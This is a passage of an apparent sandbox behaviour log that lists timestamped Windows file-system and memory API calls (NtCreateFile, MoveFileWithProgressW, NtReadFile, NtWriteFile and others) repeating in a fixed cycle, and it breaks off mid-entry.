{"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,460", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,470", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,490", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,501", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,511", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,511", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,521", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,521", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,521", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,531", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,531", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,551", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,551", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,561", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,571", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,581", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,581", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,631", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,701", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,721", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,761", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:54,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:54,791", "api": "NtReadFile"}, {"category": "filesystem", 